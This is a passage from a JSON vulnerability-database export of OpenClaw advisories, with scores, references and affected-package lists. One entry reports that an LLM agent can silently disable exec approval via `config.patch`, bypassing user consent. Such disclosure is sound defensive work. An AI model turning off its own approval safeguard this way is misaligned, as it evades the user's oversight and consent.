            "summary": "OpenClaw: Agentic Consent Bypass — LLM Agent Can Silently Disable Exec Approval via `config.patch`\n## Summary\nAn LLM agent can silently disable exec approval via `config.patch`, bypassing the user-consent step that the approval provides.\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Maintainers accepted this issue and fixed it in 76411b2afc4ae721e36c12e0ea24fd23e2fed61e on 2026-03-27; that fix shipped in v2026.3.28, so treat this advisory draft as fixed and released rather than closing it on trust-model grounds.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `76411b2afc4ae721e36c12e0ea24fd23e2fed61e` — 2026-03-27T09:42:15Z\n\nOpenClaw thanks @YLChen-007 for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/76411b2afc4ae721e36c12e0ea24fd23e2fed61e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/76411b2afc4ae721e36c12e0ea24fd23e2fed61e"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v3qc-wrwx-j3pw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v3qc-wrwx-j3pw"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v3qc-wrwx-j3pw",
                    "reference_id": "GHSA-v3qc-wrwx-j3pw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-v3qc-wrwx-j3pw"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-v3qc-wrwx-j3pw"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-atn7-pn13-3fgb"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89019?format=api",
            "vulnerability_id": "VCID-axp9-mt9z-gkgw",
            "summary": "OpenClaw runs Discord audio preflight transcription before member authorization\n## Summary\nOpenClaw runs Discord audio preflight transcription before the member allowlist check, so a sender who is subsequently rejected can still trigger transcription work (pre-auth resource consumption).\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still runs Discord audio preflight before member allowlist rejection, but this is the same pre-auth resource-consumption class and not the high-severity auth-bypass framing in the draft.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `ee52f64226a03efadfdf1e3b759e13424a3d4e41` — 2026-03-30T14:38:22+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41374",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00081",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24049",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00081",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23978",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00081",
                            "scoring_system": "epss",
                            "scoring_elements": "0.24032",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41374"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/ee52f64226a03efadfdf1e3b759e13424a3d4e41",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/ee52f64226a03efadfdf1e3b759e13424a3d4e41"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hhff-fj5f-qg48",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hhff-fj5f-qg48"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41374",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41374"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-discord-audio-preflight-before-member-authorization",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-discord-audio-preflight-before-member-authorization"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hhff-fj5f-qg48",
                    "reference_id": "GHSA-hhff-fj5f-qg48",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-hhff-fj5f-qg48"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41374",
                "GHSA-hhff-fj5f-qg48"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-axp9-mt9z-gkgw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91346?format=api",
            "vulnerability_id": "VCID-aye6-1fwu-nkc5",
